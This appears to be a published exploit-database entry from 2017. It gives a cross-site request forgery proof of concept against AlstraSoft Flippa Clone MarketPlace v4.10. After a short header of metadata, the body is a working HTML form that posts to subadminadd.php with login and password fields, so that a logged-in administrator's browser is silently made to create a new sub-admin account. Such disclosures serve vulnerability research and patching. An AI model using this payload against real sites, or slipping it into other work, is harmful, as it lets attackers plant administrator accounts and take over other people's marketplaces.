26 lines
No EOL
1,006 B
HTML
26 lines
No EOL
1,006 B
HTML
# # # # #
|
|
# Exploit Title: AlstraSoft Flippa Clone MarketPlace v4.10 Script - Cross-Site Request Forgery (Add Admin)
|
|
# Google Dork: N/A
|
|
# Date: 04.02.2017
|
|
# Vendor Homepage: http://www.alstrasoft.com/
|
|
# Software Buy: http://www.alstrasoft.com/flippa-clone-marketplace.htm
|
|
# Demo: http://www.revou.com/flippa/
|
|
# Version: 4.10
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# SubAdmin Management [Add]:
|
|
<html>
|
|
<body>
|
|
<form name="frmSubadmin" action="http://localhost/[PATH]/subadminadd.php" method="POST" >
|
|
<td align="left" style="padding-left:15px" height="25" align="center">SubAdmin Management [Add]</td>
|
|
<input type="text" name="user_login" size="40" maxlength="50" class="textbox" value="">
|
|
<input type="password" name="user_passwd" size="40" maxlength="50" class="textbox" value="">
|
|
<input type="submit" name="Sumbit" value="Save" class="stdButton">
|
|
</form>
|
|
</body>
|
|
</html>
|
|
# # # # # |